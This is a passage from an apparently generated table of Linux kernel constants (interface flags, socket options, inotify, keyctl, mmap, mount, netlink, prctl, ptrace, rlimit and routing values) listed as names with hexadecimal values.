IFF_MULTI_QUEUE = 0x100
IFF_NOARP = 0x80
IFF_NOFILTER = 0x1000
IFF_NOTRAILERS = 0x20
IFF_NO_PI = 0x1000
IFF_ONE_QUEUE = 0x2000
IFF_PERSIST = 0x800
IFF_POINTOPOINT = 0x10
IFF_PORTSEL = 0x2000
IFF_PROMISC = 0x100
IFF_RUNNING = 0x40
IFF_SLAVE = 0x800
IFF_TAP = 0x2
IFF_TUN = 0x1
IFF_TUN_EXCL = 0x8000
IFF_UP = 0x1
IFF_VNET_HDR = 0x4000
IFF_VOLATILE = 0x70c5a
IFNAMSIZ = 0x10
IGNBRK = 0x1
IGNCR = 0x80
IGNPAR = 0x4
IMAXBEL = 0x2000
INLCR = 0x40
INPCK = 0x10
IN_ACCESS = 0x1
IN_ALL_EVENTS = 0xfff
IN_ATTRIB = 0x4
IN_CLASSA_HOST = 0xffffff
IN_CLASSA_MAX = 0x80
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 0x18
IN_CLASSB_HOST = 0xffff
IN_CLASSB_MAX = 0x10000
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 0x10
IN_CLASSC_HOST = 0xff
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 0x8
IN_CLOEXEC = 0x80000
IN_CLOSE = 0x18
IN_CLOSE_NOWRITE = 0x10
IN_CLOSE_WRITE = 0x8
IN_CREATE = 0x100
IN_DELETE = 0x200
IN_DELETE_SELF = 0x400
IN_DONT_FOLLOW = 0x2000000
IN_EXCL_UNLINK = 0x4000000
IN_IGNORED = 0x8000
IN_ISDIR = 0x40000000
IN_LOOPBACKNET = 0x7f
IN_MASK_ADD = 0x20000000
IN_MODIFY = 0x2
IN_MOVE = 0xc0
IN_MOVED_FROM = 0x40
IN_MOVED_TO = 0x80
IN_MOVE_SELF = 0x800
IN_NONBLOCK = 0x800
IN_ONESHOT = 0x80000000
IN_ONLYDIR = 0x1000000
IN_OPEN = 0x20
IN_Q_OVERFLOW = 0x4000
IN_UNMOUNT = 0x2000
IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9
IPPROTO_AH = 0x33
IPPROTO_BEETPH = 0x5e
IPPROTO_COMP = 0x6c
IPPROTO_DCCP = 0x21
IPPROTO_DSTOPTS = 0x3c
IPPROTO_EGP = 0x8
IPPROTO_ENCAP = 0x62
IPPROTO_ESP = 0x32
IPPROTO_FRAGMENT = 0x2c
IPPROTO_GRE = 0x2f
IPPROTO_HOPOPTS = 0x0
IPPROTO_ICMP = 0x1
IPPROTO_ICMPV6 = 0x3a
IPPROTO_IDP = 0x16
IPPROTO_IGMP = 0x2
IPPROTO_IP = 0x0
IPPROTO_IPIP = 0x4
IPPROTO_IPV6 = 0x29
IPPROTO_MH = 0x87
IPPROTO_MPLS = 0x89
IPPROTO_MTP = 0x5c
IPPROTO_NONE = 0x3b
IPPROTO_PIM = 0x67
IPPROTO_PUP = 0xc
IPPROTO_RAW = 0xff
IPPROTO_ROUTING = 0x2b
IPPROTO_RSVP = 0x2e
IPPROTO_SCTP = 0x84
IPPROTO_TCP = 0x6
IPPROTO_TP = 0x1d
IPPROTO_UDP = 0x11
IPPROTO_UDPLITE = 0x88
IPV6_2292DSTOPTS = 0x4
IPV6_2292HOPLIMIT = 0x8
IPV6_2292HOPOPTS = 0x3
IPV6_2292PKTINFO = 0x2
IPV6_2292PKTOPTIONS = 0x6
IPV6_2292RTHDR = 0x5
IPV6_ADDRFORM = 0x1
IPV6_ADDR_PREFERENCES = 0x48
IPV6_ADD_MEMBERSHIP = 0x14
IPV6_AUTHHDR = 0xa
IPV6_AUTOFLOWLABEL = 0x46
IPV6_CHECKSUM = 0x7
IPV6_DONTFRAG = 0x3e
IPV6_DROP_MEMBERSHIP = 0x15
IPV6_DSTOPTS = 0x3b
IPV6_HDRINCL = 0x24
IPV6_HOPLIMIT = 0x34
IPV6_HOPOPTS = 0x36
IPV6_IPSEC_POLICY = 0x22
IPV6_JOIN_ANYCAST = 0x1b
IPV6_JOIN_GROUP = 0x14
IPV6_LEAVE_ANYCAST = 0x1c
IPV6_LEAVE_GROUP = 0x15
IPV6_MINHOPCOUNT = 0x49
IPV6_MTU = 0x18
IPV6_MTU_DISCOVER = 0x17
IPV6_MULTICAST_HOPS = 0x12
IPV6_MULTICAST_IF = 0x11
IPV6_MULTICAST_LOOP = 0x13
IPV6_NEXTHOP = 0x9
IPV6_ORIGDSTADDR = 0x4a
IPV6_PATHMTU = 0x3d
IPV6_PKTINFO = 0x32
IPV6_PMTUDISC_DO = 0x2
IPV6_PMTUDISC_DONT = 0x0
IPV6_PMTUDISC_INTERFACE = 0x4
IPV6_PMTUDISC_OMIT = 0x5
IPV6_PMTUDISC_PROBE = 0x3
IPV6_PMTUDISC_WANT = 0x1
IPV6_RECVDSTOPTS = 0x3a
IPV6_RECVERR = 0x19
IPV6_RECVFRAGSIZE = 0x4d
IPV6_RECVHOPLIMIT = 0x33
IPV6_RECVHOPOPTS = 0x35
IPV6_RECVORIGDSTADDR = 0x4a
IPV6_RECVPATHMTU = 0x3c
IPV6_RECVPKTINFO = 0x31
IPV6_RECVRTHDR = 0x38
IPV6_RECVTCLASS = 0x42
IPV6_ROUTER_ALERT = 0x16
IPV6_RTHDR = 0x39
IPV6_RTHDRDSTOPTS = 0x37
IPV6_RTHDR_LOOSE = 0x0
IPV6_RTHDR_STRICT = 0x1
IPV6_RTHDR_TYPE_0 = 0x0
IPV6_RXDSTOPTS = 0x3b
IPV6_RXHOPOPTS = 0x36
IPV6_TCLASS = 0x43
IPV6_TRANSPARENT = 0x4b
IPV6_UNICAST_HOPS = 0x10
IPV6_UNICAST_IF = 0x4c
IPV6_V6ONLY = 0x1a
IPV6_XFRM_POLICY = 0x23
IP_ADD_MEMBERSHIP = 0x23
IP_ADD_SOURCE_MEMBERSHIP = 0x27
IP_BIND_ADDRESS_NO_PORT = 0x18
IP_BLOCK_SOURCE = 0x26
IP_CHECKSUM = 0x17
IP_DEFAULT_MULTICAST_LOOP = 0x1
IP_DEFAULT_MULTICAST_TTL = 0x1
IP_DF = 0x4000
IP_DROP_MEMBERSHIP = 0x24
IP_DROP_SOURCE_MEMBERSHIP = 0x28
IP_FREEBIND = 0xf
IP_HDRINCL = 0x3
IP_IPSEC_POLICY = 0x10
IP_MAXPACKET = 0xffff
IP_MAX_MEMBERSHIPS = 0x14
IP_MF = 0x2000
IP_MINTTL = 0x15
IP_MSFILTER = 0x29
IP_MSS = 0x240
IP_MTU = 0xe
IP_MTU_DISCOVER = 0xa
IP_MULTICAST_ALL = 0x31
IP_MULTICAST_IF = 0x20
IP_MULTICAST_LOOP = 0x22
IP_MULTICAST_TTL = 0x21
IP_NODEFRAG = 0x16
IP_OFFMASK = 0x1fff
IP_OPTIONS = 0x4
IP_ORIGDSTADDR = 0x14
IP_PASSSEC = 0x12
IP_PKTINFO = 0x8
IP_PKTOPTIONS = 0x9
IP_PMTUDISC = 0xa
IP_PMTUDISC_DO = 0x2
IP_PMTUDISC_DONT = 0x0
IP_PMTUDISC_INTERFACE = 0x4
IP_PMTUDISC_OMIT = 0x5
IP_PMTUDISC_PROBE = 0x3
IP_PMTUDISC_WANT = 0x1
IP_RECVERR = 0xb
IP_RECVFRAGSIZE = 0x19
IP_RECVOPTS = 0x6
IP_RECVORIGDSTADDR = 0x14
IP_RECVRETOPTS = 0x7
IP_RECVTOS = 0xd
IP_RECVTTL = 0xc
IP_RETOPTS = 0x7
IP_RF = 0x8000
IP_ROUTER_ALERT = 0x5
IP_TOS = 0x1
IP_TRANSPARENT = 0x13
IP_TTL = 0x2
IP_UNBLOCK_SOURCE = 0x25
IP_UNICAST_IF = 0x32
IP_XFRM_POLICY = 0x11
ISIG = 0x1
ISTRIP = 0x20
IUCLC = 0x200
IUTF8 = 0x4000
IXANY = 0x800
IXOFF = 0x1000
IXON = 0x400
KEYCTL_ASSUME_AUTHORITY = 0x10
KEYCTL_CHOWN = 0x4
KEYCTL_CLEAR = 0x7
KEYCTL_DESCRIBE = 0x6
KEYCTL_DH_COMPUTE = 0x17
KEYCTL_GET_KEYRING_ID = 0x0
KEYCTL_GET_PERSISTENT = 0x16
KEYCTL_GET_SECURITY = 0x11
KEYCTL_INSTANTIATE = 0xc
KEYCTL_INSTANTIATE_IOV = 0x14
KEYCTL_INVALIDATE = 0x15
KEYCTL_JOIN_SESSION_KEYRING = 0x1
KEYCTL_LINK = 0x8
KEYCTL_NEGATE = 0xd
KEYCTL_READ = 0xb
KEYCTL_REJECT = 0x13
KEYCTL_RESTRICT_KEYRING = 0x1d
KEYCTL_REVOKE = 0x3
KEYCTL_SEARCH = 0xa
KEYCTL_SESSION_TO_PARENT = 0x12
KEYCTL_SETPERM = 0x5
KEYCTL_SET_REQKEY_KEYRING = 0xe
KEYCTL_SET_TIMEOUT = 0xf
KEYCTL_UNLINK = 0x9
KEYCTL_UPDATE = 0x2
KEY_REQKEY_DEFL_DEFAULT = 0x0
KEY_REQKEY_DEFL_GROUP_KEYRING = 0x6
KEY_REQKEY_DEFL_NO_CHANGE = -0x1
KEY_REQKEY_DEFL_PROCESS_KEYRING = 0x2
KEY_REQKEY_DEFL_REQUESTOR_KEYRING = 0x7
KEY_REQKEY_DEFL_SESSION_KEYRING = 0x3
KEY_REQKEY_DEFL_THREAD_KEYRING = 0x1
KEY_REQKEY_DEFL_USER_KEYRING = 0x4
KEY_REQKEY_DEFL_USER_SESSION_KEYRING = 0x5
KEY_SPEC_GROUP_KEYRING = -0x6
KEY_SPEC_PROCESS_KEYRING = -0x2
KEY_SPEC_REQKEY_AUTH_KEY = -0x7
KEY_SPEC_REQUESTOR_KEYRING = -0x8
KEY_SPEC_SESSION_KEYRING = -0x3
KEY_SPEC_THREAD_KEYRING = -0x1
KEY_SPEC_USER_KEYRING = -0x4
KEY_SPEC_USER_SESSION_KEYRING = -0x5
LINUX_REBOOT_CMD_CAD_OFF = 0x0
LINUX_REBOOT_CMD_CAD_ON = 0x89abcdef
LINUX_REBOOT_CMD_HALT = 0xcdef0123
LINUX_REBOOT_CMD_KEXEC = 0x45584543
LINUX_REBOOT_CMD_POWER_OFF = 0x4321fedc
LINUX_REBOOT_CMD_RESTART = 0x1234567
LINUX_REBOOT_CMD_RESTART2 = 0xa1b2c3d4
LINUX_REBOOT_CMD_SW_SUSPEND = 0xd000fce2
LINUX_REBOOT_MAGIC1 = 0xfee1dead
LINUX_REBOOT_MAGIC2 = 0x28121969
LOCK_EX = 0x2
LOCK_NB = 0x4
LOCK_SH = 0x1
LOCK_UN = 0x8
MADV_DODUMP = 0x11
MADV_DOFORK = 0xb
MADV_DONTDUMP = 0x10
MADV_DONTFORK = 0xa
MADV_DONTNEED = 0x4
MADV_FREE = 0x8
MADV_HUGEPAGE = 0xe
MADV_HWPOISON = 0x64
MADV_MERGEABLE = 0xc
MADV_NOHUGEPAGE = 0xf
MADV_NORMAL = 0x0
MADV_RANDOM = 0x1
MADV_REMOVE = 0x9
MADV_SEQUENTIAL = 0x2
MADV_UNMERGEABLE = 0xd
MADV_WILLNEED = 0x3
MAP_32BIT = 0x40
MAP_ANON = 0x20
MAP_ANONYMOUS = 0x20
MAP_DENYWRITE = 0x800
MAP_EXECUTABLE = 0x1000
MAP_FILE = 0x0
MAP_FIXED = 0x10
MAP_GROWSDOWN = 0x100
MAP_HUGETLB = 0x40000
MAP_HUGE_MASK = 0x3f
MAP_HUGE_SHIFT = 0x1a
MAP_LOCKED = 0x2000
MAP_NONBLOCK = 0x10000
MAP_NORESERVE = 0x4000
MAP_POPULATE = 0x8000
MAP_PRIVATE = 0x2
MAP_SHARED = 0x1
MAP_STACK = 0x20000
MAP_TYPE = 0xf
MCL_CURRENT = 0x1
MCL_FUTURE = 0x2
MCL_ONFAULT = 0x4
MNT_DETACH = 0x2
MNT_EXPIRE = 0x4
MNT_FORCE = 0x1
MSG_BATCH = 0x40000
MSG_CMSG_CLOEXEC = 0x40000000
MSG_CONFIRM = 0x800
MSG_CTRUNC = 0x8
MSG_DONTROUTE = 0x4
MSG_DONTWAIT = 0x40
MSG_EOR = 0x80
MSG_ERRQUEUE = 0x2000
MSG_FASTOPEN = 0x20000000
MSG_FIN = 0x200
MSG_MORE = 0x8000
MSG_NOSIGNAL = 0x4000
MSG_OOB = 0x1
MSG_PEEK = 0x2
MSG_PROXY = 0x10
MSG_RST = 0x1000
MSG_SYN = 0x400
MSG_TRUNC = 0x20
MSG_TRYHARD = 0x4
MSG_WAITALL = 0x100
MSG_WAITFORONE = 0x10000
MS_ACTIVE = 0x40000000
MS_ASYNC = 0x1
MS_BIND = 0x1000
MS_BORN = 0x20000000
MS_DIRSYNC = 0x80
MS_INVALIDATE = 0x2
MS_I_VERSION = 0x800000
MS_KERNMOUNT = 0x400000
MS_LAZYTIME = 0x2000000
MS_MANDLOCK = 0x40
MS_MGC_MSK = 0xffff0000
MS_MGC_VAL = 0xc0ed0000
MS_MOVE = 0x2000
MS_NOATIME = 0x400
MS_NODEV = 0x4
MS_NODIRATIME = 0x800
MS_NOEXEC = 0x8
MS_NOREMOTELOCK = 0x8000000
MS_NOSEC = 0x10000000
MS_NOSUID = 0x2
MS_NOUSER = -0x80000000
MS_POSIXACL = 0x10000
MS_PRIVATE = 0x40000
MS_RDONLY = 0x1
MS_REC = 0x4000
MS_RELATIME = 0x200000
MS_REMOUNT = 0x20
MS_RMT_MASK = 0x2800051
MS_SHARED = 0x100000
MS_SILENT = 0x8000
MS_SLAVE = 0x80000
MS_STRICTATIME = 0x1000000
MS_SUBMOUNT = 0x4000000
MS_SYNC = 0x4
MS_SYNCHRONOUS = 0x10
MS_UNBINDABLE = 0x20000
MS_VERBOSE = 0x8000
NAME_MAX = 0xff
NETLINK_ADD_MEMBERSHIP = 0x1
NETLINK_AUDIT = 0x9
NETLINK_BROADCAST_ERROR = 0x4
NETLINK_CAP_ACK = 0xa
NETLINK_CONNECTOR = 0xb
NETLINK_CRYPTO = 0x15
NETLINK_DNRTMSG = 0xe
NETLINK_DROP_MEMBERSHIP = 0x2
NETLINK_ECRYPTFS = 0x13
NETLINK_EXT_ACK = 0xb
NETLINK_FIB_LOOKUP = 0xa
NETLINK_FIREWALL = 0x3
NETLINK_GENERIC = 0x10
NETLINK_INET_DIAG = 0x4
NETLINK_IP6_FW = 0xd
NETLINK_ISCSI = 0x8
NETLINK_KOBJECT_UEVENT = 0xf
NETLINK_LISTEN_ALL_NSID = 0x8
NETLINK_LIST_MEMBERSHIPS = 0x9
NETLINK_NETFILTER = 0xc
NETLINK_NFLOG = 0x5
NETLINK_NO_ENOBUFS = 0x5
NETLINK_PKTINFO = 0x3
NETLINK_RDMA = 0x14
NETLINK_ROUTE = 0x0
NETLINK_RX_RING = 0x6
NETLINK_SCSITRANSPORT = 0x12
NETLINK_SELINUX = 0x7
NETLINK_SMC = 0x16
NETLINK_SOCK_DIAG = 0x4
NETLINK_TX_RING = 0x7
NETLINK_UNUSED = 0x1
NETLINK_USERSOCK = 0x2
NETLINK_XFRM = 0x6
NL0 = 0x0
NL1 = 0x100
NLA_ALIGNTO = 0x4
NLA_F_NESTED = 0x8000
NLA_F_NET_BYTEORDER = 0x4000
NLA_HDRLEN = 0x4
NLDLY = 0x100
NLMSG_ALIGNTO = 0x4
NLMSG_DONE = 0x3
NLMSG_ERROR = 0x2
NLMSG_HDRLEN = 0x10
NLMSG_MIN_TYPE = 0x10
NLMSG_NOOP = 0x1
NLMSG_OVERRUN = 0x4
NLM_F_ACK = 0x4
NLM_F_ACK_TLVS = 0x200
NLM_F_APPEND = 0x800
NLM_F_ATOMIC = 0x400
NLM_F_CAPPED = 0x100
NLM_F_CREATE = 0x400
NLM_F_DUMP = 0x300
NLM_F_DUMP_FILTERED = 0x20
NLM_F_DUMP_INTR = 0x10
NLM_F_ECHO = 0x8
NLM_F_EXCL = 0x200
NLM_F_MATCH = 0x200
NLM_F_MULTI = 0x2
NLM_F_REPLACE = 0x100
NLM_F_REQUEST = 0x1
NLM_F_ROOT = 0x100
NOFLSH = 0x80
OCRNL = 0x8
OFDEL = 0x80
OFILL = 0x40
OLCUC = 0x2
ONLCR = 0x4
ONLRET = 0x20
ONOCR = 0x10
OPOST = 0x1
O_ACCMODE = 0x3
O_APPEND = 0x400
O_ASYNC = 0x2000
O_CLOEXEC = 0x80000
O_CREAT = 0x40
O_DIRECT = 0x4000
O_DIRECTORY = 0x10000
O_DSYNC = 0x1000
O_EXCL = 0x80
O_FSYNC = 0x101000
O_LARGEFILE = 0x0
O_NDELAY = 0x800
O_NOATIME = 0x40000
O_NOCTTY = 0x100
O_NOFOLLOW = 0x20000
O_NONBLOCK = 0x800
O_PATH = 0x200000
O_RDONLY = 0x0
O_RDWR = 0x2
O_RSYNC = 0x101000
O_SYNC = 0x101000
O_TMPFILE = 0x410000
O_TRUNC = 0x200
O_WRONLY = 0x1
PACKET_ADD_MEMBERSHIP = 0x1
PACKET_AUXDATA = 0x8
PACKET_BROADCAST = 0x1
PACKET_COPY_THRESH = 0x7
PACKET_DROP_MEMBERSHIP = 0x2
PACKET_FANOUT = 0x12
PACKET_FANOUT_CBPF = 0x6
PACKET_FANOUT_CPU = 0x2
PACKET_FANOUT_DATA = 0x16
PACKET_FANOUT_EBPF = 0x7
PACKET_FANOUT_FLAG_DEFRAG = 0x8000
PACKET_FANOUT_FLAG_ROLLOVER = 0x1000
PACKET_FANOUT_FLAG_UNIQUEID = 0x2000
PACKET_FANOUT_HASH = 0x0
PACKET_FANOUT_LB = 0x1
PACKET_FANOUT_QM = 0x5
PACKET_FANOUT_RND = 0x4
PACKET_FANOUT_ROLLOVER = 0x3
PACKET_FASTROUTE = 0x6
PACKET_HDRLEN = 0xb
PACKET_HOST = 0x0
PACKET_KERNEL = 0x7
PACKET_LOOPBACK = 0x5
PACKET_LOSS = 0xe
PACKET_MR_ALLMULTI = 0x2
PACKET_MR_MULTICAST = 0x0
PACKET_MR_PROMISC = 0x1
PACKET_MR_UNICAST = 0x3
PACKET_MULTICAST = 0x2
PACKET_ORIGDEV = 0x9
PACKET_OTHERHOST = 0x3
PACKET_OUTGOING = 0x4
PACKET_QDISC_BYPASS = 0x14
PACKET_RECV_OUTPUT = 0x3
PACKET_RESERVE = 0xc
PACKET_ROLLOVER_STATS = 0x15
PACKET_RX_RING = 0x5
PACKET_STATISTICS = 0x6
PACKET_TIMESTAMP = 0x11
PACKET_TX_HAS_OFF = 0x13
PACKET_TX_RING = 0xd
PACKET_TX_TIMESTAMP = 0x10
PACKET_USER = 0x6
PACKET_VERSION = 0xa
PACKET_VNET_HDR = 0xf
PARENB = 0x100
PARITY_CRC16_PR0 = 0x2
PARITY_CRC16_PR0_CCITT = 0x4
PARITY_CRC16_PR1 = 0x3
PARITY_CRC16_PR1_CCITT = 0x5
PARITY_CRC32_PR0_CCITT = 0x6
PARITY_CRC32_PR1_CCITT = 0x7
PARITY_DEFAULT = 0x0
PARITY_NONE = 0x1
PARMRK = 0x8
PARODD = 0x200
PENDIN = 0x4000
PERF_EVENT_IOC_DISABLE = 0x2401
PERF_EVENT_IOC_ENABLE = 0x2400
PERF_EVENT_IOC_ID = 0x80082407
PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409
PERF_EVENT_IOC_PERIOD = 0x40082404
PERF_EVENT_IOC_REFRESH = 0x2402
PERF_EVENT_IOC_RESET = 0x2403
PERF_EVENT_IOC_SET_BPF = 0x40042408
PERF_EVENT_IOC_SET_FILTER = 0x40082406
PERF_EVENT_IOC_SET_OUTPUT = 0x2405
PRIO_PGRP = 0x1
PRIO_PROCESS = 0x0
PRIO_USER = 0x2
PROT_EXEC = 0x4
PROT_GROWSDOWN = 0x1000000
PROT_GROWSUP = 0x2000000
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
PR_CAPBSET_DROP = 0x18
PR_CAPBSET_READ = 0x17
PR_CAP_AMBIENT = 0x2f
PR_CAP_AMBIENT_CLEAR_ALL = 0x4
PR_CAP_AMBIENT_IS_SET = 0x1
PR_CAP_AMBIENT_LOWER = 0x3
PR_CAP_AMBIENT_RAISE = 0x2
PR_ENDIAN_BIG = 0x0
PR_ENDIAN_LITTLE = 0x1
PR_ENDIAN_PPC_LITTLE = 0x2
PR_FPEMU_NOPRINT = 0x1
PR_FPEMU_SIGFPE = 0x2
PR_FP_EXC_ASYNC = 0x2
PR_FP_EXC_DISABLED = 0x0
PR_FP_EXC_DIV = 0x10000
PR_FP_EXC_INV = 0x100000
PR_FP_EXC_NONRECOV = 0x1
PR_FP_EXC_OVF = 0x20000
PR_FP_EXC_PRECISE = 0x3
PR_FP_EXC_RES = 0x80000
PR_FP_EXC_SW_ENABLE = 0x80
PR_FP_EXC_UND = 0x40000
PR_FP_MODE_FR = 0x1
PR_FP_MODE_FRE = 0x2
PR_GET_CHILD_SUBREAPER = 0x25
PR_GET_DUMPABLE = 0x3
PR_GET_ENDIAN = 0x13
PR_GET_FPEMU = 0x9
PR_GET_FPEXC = 0xb
PR_GET_FP_MODE = 0x2e
PR_GET_KEEPCAPS = 0x7
PR_GET_NAME = 0x10
PR_GET_NO_NEW_PRIVS = 0x27
PR_GET_PDEATHSIG = 0x2
PR_GET_SECCOMP = 0x15
PR_GET_SECUREBITS = 0x1b
PR_GET_THP_DISABLE = 0x2a
PR_GET_TID_ADDRESS = 0x28
PR_GET_TIMERSLACK = 0x1e
PR_GET_TIMING = 0xd
PR_GET_TSC = 0x19
PR_GET_UNALIGN = 0x5
PR_MCE_KILL = 0x21
PR_MCE_KILL_CLEAR = 0x0
PR_MCE_KILL_DEFAULT = 0x2
PR_MCE_KILL_EARLY = 0x1
PR_MCE_KILL_GET = 0x22
PR_MCE_KILL_LATE = 0x0
PR_MCE_KILL_SET = 0x1
PR_MPX_DISABLE_MANAGEMENT = 0x2c
PR_MPX_ENABLE_MANAGEMENT = 0x2b
PR_SET_CHILD_SUBREAPER = 0x24
PR_SET_DUMPABLE = 0x4
PR_SET_ENDIAN = 0x14
PR_SET_FPEMU = 0xa
PR_SET_FPEXC = 0xc
PR_SET_FP_MODE = 0x2d
PR_SET_KEEPCAPS = 0x8
PR_SET_MM = 0x23
PR_SET_MM_ARG_END = 0x9
PR_SET_MM_ARG_START = 0x8
PR_SET_MM_AUXV = 0xc
PR_SET_MM_BRK = 0x7
PR_SET_MM_END_CODE = 0x2
PR_SET_MM_END_DATA = 0x4
PR_SET_MM_ENV_END = 0xb
PR_SET_MM_ENV_START = 0xa
PR_SET_MM_EXE_FILE = 0xd
PR_SET_MM_MAP = 0xe
PR_SET_MM_MAP_SIZE = 0xf
PR_SET_MM_START_BRK = 0x6
PR_SET_MM_START_CODE = 0x1
PR_SET_MM_START_DATA = 0x3
PR_SET_MM_START_STACK = 0x5
PR_SET_NAME = 0xf
PR_SET_NO_NEW_PRIVS = 0x26
PR_SET_PDEATHSIG = 0x1
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = 0xffffffffffffffff
PR_SET_SECCOMP = 0x16
PR_SET_SECUREBITS = 0x1c
PR_SET_THP_DISABLE = 0x29
PR_SET_TIMERSLACK = 0x1d
PR_SET_TIMING = 0xe
PR_SET_TSC = 0x1a
PR_SET_UNALIGN = 0x6
PR_TASK_PERF_EVENTS_DISABLE = 0x1f
PR_TASK_PERF_EVENTS_ENABLE = 0x20
PR_TIMING_STATISTICAL = 0x0
PR_TIMING_TIMESTAMP = 0x1
PR_TSC_ENABLE = 0x1
PR_TSC_SIGSEGV = 0x2
PR_UNALIGN_NOPRINT = 0x1
PR_UNALIGN_SIGBUS = 0x2
PTRACE_ARCH_PRCTL = 0x1e
PTRACE_ATTACH = 0x10
PTRACE_CONT = 0x7
PTRACE_DETACH = 0x11
PTRACE_EVENT_CLONE = 0x3
PTRACE_EVENT_EXEC = 0x4
PTRACE_EVENT_EXIT = 0x6
PTRACE_EVENT_FORK = 0x1
PTRACE_EVENT_SECCOMP = 0x7
PTRACE_EVENT_STOP = 0x80
PTRACE_EVENT_VFORK = 0x2
PTRACE_EVENT_VFORK_DONE = 0x5
PTRACE_GETEVENTMSG = 0x4201
PTRACE_GETFPREGS = 0xe
PTRACE_GETFPXREGS = 0x12
PTRACE_GETREGS = 0xc
PTRACE_GETREGSET = 0x4204
PTRACE_GETSIGINFO = 0x4202
PTRACE_GETSIGMASK = 0x420a
PTRACE_GET_THREAD_AREA = 0x19
PTRACE_INTERRUPT = 0x4207
PTRACE_KILL = 0x8
PTRACE_LISTEN = 0x4208
PTRACE_OLDSETOPTIONS = 0x15
PTRACE_O_EXITKILL = 0x100000
PTRACE_O_MASK = 0x3000ff
PTRACE_O_SUSPEND_SECCOMP = 0x200000
PTRACE_O_TRACECLONE = 0x8
PTRACE_O_TRACEEXEC = 0x10
PTRACE_O_TRACEEXIT = 0x40
PTRACE_O_TRACEFORK = 0x2
PTRACE_O_TRACESECCOMP = 0x80
PTRACE_O_TRACESYSGOOD = 0x1
PTRACE_O_TRACEVFORK = 0x4
PTRACE_O_TRACEVFORKDONE = 0x20
PTRACE_PEEKDATA = 0x2
PTRACE_PEEKSIGINFO = 0x4209
PTRACE_PEEKSIGINFO_SHARED = 0x1
PTRACE_PEEKTEXT = 0x1
PTRACE_PEEKUSR = 0x3
PTRACE_POKEDATA = 0x5
PTRACE_POKETEXT = 0x4
PTRACE_POKEUSR = 0x6
PTRACE_SECCOMP_GET_FILTER = 0x420c
PTRACE_SEIZE = 0x4206
PTRACE_SETFPREGS = 0xf
PTRACE_SETFPXREGS = 0x13
PTRACE_SETOPTIONS = 0x4200
PTRACE_SETREGS = 0xd
PTRACE_SETREGSET = 0x4205
PTRACE_SETSIGINFO = 0x4203
PTRACE_SETSIGMASK = 0x420b
PTRACE_SET_THREAD_AREA = 0x1a
PTRACE_SINGLEBLOCK = 0x21
PTRACE_SINGLESTEP = 0x9
PTRACE_SYSCALL = 0x18
PTRACE_SYSEMU = 0x1f
PTRACE_SYSEMU_SINGLESTEP = 0x20
PTRACE_TRACEME = 0x0
RLIMIT_AS = 0x9
RLIMIT_CORE = 0x4
RLIMIT_CPU = 0x0
RLIMIT_DATA = 0x2
RLIMIT_FSIZE = 0x1
RLIMIT_LOCKS = 0xa
RLIMIT_MEMLOCK = 0x8
RLIMIT_MSGQUEUE = 0xc
RLIMIT_NICE = 0xd
RLIMIT_NOFILE = 0x7
RLIMIT_NPROC = 0x6
RLIMIT_RSS = 0x5
RLIMIT_RTPRIO = 0xe
RLIMIT_RTTIME = 0xf
RLIMIT_SIGPENDING = 0xb
RLIMIT_STACK = 0x3
RLIM_INFINITY = 0xffffffffffffffff
RTAX_ADVMSS = 0x8
RTAX_CC_ALGO = 0x10
RTAX_CWND = 0x7
RTAX_FEATURES = 0xc
RTAX_FEATURE_ALLFRAG = 0x8
RTAX_FEATURE_ECN = 0x1
RTAX_FEATURE_MASK = 0xf
RTAX_FEATURE_SACK = 0x2
RTAX_FEATURE_TIMESTAMP = 0x4
RTAX_HOPLIMIT = 0xa
RTAX_INITCWND = 0xb
RTAX_INITRWND = 0xe
RTAX_LOCK = 0x1
RTAX_MAX = 0x10
RTAX_MTU = 0x2
RTAX_QUICKACK = 0xf
RTAX_REORDERING = 0x9
RTAX_RTO_MIN = 0xd
RTAX_RTT = 0x4
RTAX_RTTVAR = 0x5
RTAX_SSTHRESH = 0x6
RTAX_UNSPEC = 0x0
RTAX_WINDOW = 0x3
RTA_ALIGNTO = 0x4
RTA_MAX = 0x1a
RTCF_DIRECTSRC = 0x4000000
RTCF_DOREDIRECT = 0x1000000
RTCF_LOG = 0x2000000
RTCF_MASQ = 0x400000
RTCF_NAT = 0x800000
RTCF_VALVE = 0x200000
RTF_ADDRCLASSMASK = 0xf8000000
RTF_ADDRCONF = 0x40000
RTF_ALLONLINK = 0x20000
RTF_BROADCAST = 0x10000000
RTF_CACHE = 0x1000000
RTF_DEFAULT = 0x10000
RTF_DYNAMIC = 0x10
RTF_FLOW = 0x2000000
RTF_GATEWAY = 0x2
RTF_HOST = 0x4
RTF_INTERFACE = 0x40000000
RTF_IRTT = 0x100
RTF_LINKRT = 0x100000
RTF_LOCAL = 0x80000000
RTF_MODIFIED = 0x20
RTF_MSS = 0x40
RTF_MTU = 0x40
RTF_MULTICAST = 0x20000000
RTF_NAT = 0x8000000
RTF_NOFORWARD = 0x1000
RTF_NONEXTHOP = 0x200000
RTF_NOPMTUDISC = 0x4000
RTF_POLICY = 0x4000000
RTF_REINSTATE = 0x8
RTF_REJECT = 0x200
RTF_STATIC = 0x400
RTF_THROW = 0x2000
RTF_UP = 0x1
RTF_WINDOW = 0x80
RTF_XRESOLVE = 0x800
RTM_BASE = 0x10
RTM_DELACTION = 0x31
RTM_DELADDR = 0x15
RTM_DELADDRLABEL = 0x49
RTM_DELLINK = 0x11
RTM_DELMDB = 0x55
RTM_DELNEIGH = 0x1d
RTM_DELNETCONF = 0x51
RTM_DELNSID = 0x59
RTM_DELQDISC = 0x25
RTM_DELROUTE = 0x19
RTM_DELRULE = 0x21
RTM_DELTCLASS = 0x29
RTM_DELTFILTER = 0x2d
RTM_F_CLONED = 0x200
RTM_F_EQUALIZE = 0x400
RTM_F_FIB_MATCH = 0x2000
RTM_F_LOOKUP_TABLE = 0x1000
RTM_F_NOTIFY = 0x100
RTM_F_PREFIX = 0x800
RTM_GETACTION = 0x32
RTM_GETADDR = 0x16
RTM_GETADDRLABEL = 0x4a
RTM_GETANYCAST = 0x3e
RTM_GETDCB = 0x4e
RTM_GETLINK = 0x12
RTM_GETMDB = 0x56
RTM_GETMULTICAST = 0x3a
RTM_GETNEIGH = 0x1e
RTM_GETNEIGHTBL = 0x42
